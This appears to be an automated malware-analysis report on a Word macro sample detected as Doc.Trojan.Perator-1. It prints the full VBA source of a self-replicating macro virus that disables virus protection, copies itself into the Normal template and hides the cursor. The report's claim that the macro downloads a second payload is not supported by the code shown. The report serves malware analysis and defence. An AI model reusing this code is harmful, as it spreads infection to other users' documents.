Malware Insights
The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to display a fake document summary dialog with the title 'bHAK 31337 oPERATOR/rUNE wAS hERE' and includes the URL 'http://lz0vx.cjb.net' in its keywords. This suggests the macro's purpose is to lure the user into enabling malicious content, likely to download and execute a secondary payload. The ClamAV detection as 'Doc.Trojan.Perator-1' further supports its malicious nature.
Heuristics 4
-
ClamAV: Doc.Trojan.Perator-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Perator-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://lz0vx.cjb.net9 In document text (OLE body)
- http://lz0vx.cjb.netIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3331 bytes |
SHA-256: aa2858fd5ed8e92647ce213add9e968375ce44b99b0d56c0924cd006c9cb39f1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Private Sub Document_Open()
On Error Resume Next: Set egger = MacroContainer: tappler = 2
With Dialogs(wdDialogFileSummaryInfo): .Title = "bHAK 31337 oPERATOR/rUNE wAS hERE": .Author = "oPERATOR": .Keywords = "http://lz0vx.cjb.net": .Execute: End With
SetAttr NormalTemplate.FullName, vbNormal: Options.SaveNormalPrompt = (Rnd * 0)
Set walchensteiner = egger.VBProject: Options.VirusProtection = (Rnd * 0)
Set laggner = walchensteiner.vbcomponents((tappler - 1)): Set gaggl = laggner.codemodule
Set straubinger = NormalTemplate: bachler = gaggl.lines((tappler - 1), gaggl.countoflines)
If egger = straubinger Then Set straubinger = ActiveDocument
Set thalhammer = straubinger.VBProject.vbcomponents((tappler - 1)).codemodule
If Right(thalhammer.lines((tappler * 26), (tappler - 1)), 27) <> "'bHAK 31337 - oPERATOR/rUNE" Then
thalhammer.deletelines 1, thalhammer.countoflines
thalhammer.addfromstring bachler
If ActiveDocument.Saved = False Then ActiveDocument.SaveAs ActiveDocument.FullName
End If
If Day(Now()) = (tappler * (Int(Rnd * 15))) Then
MsgBox "bLEED°rAKAtAKA", 0, "BHAK 31337"
While ShowCursor(False) >= 0
Wend
End If
End Sub
'bHAK 31337 - oPERATOR/rUNE
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.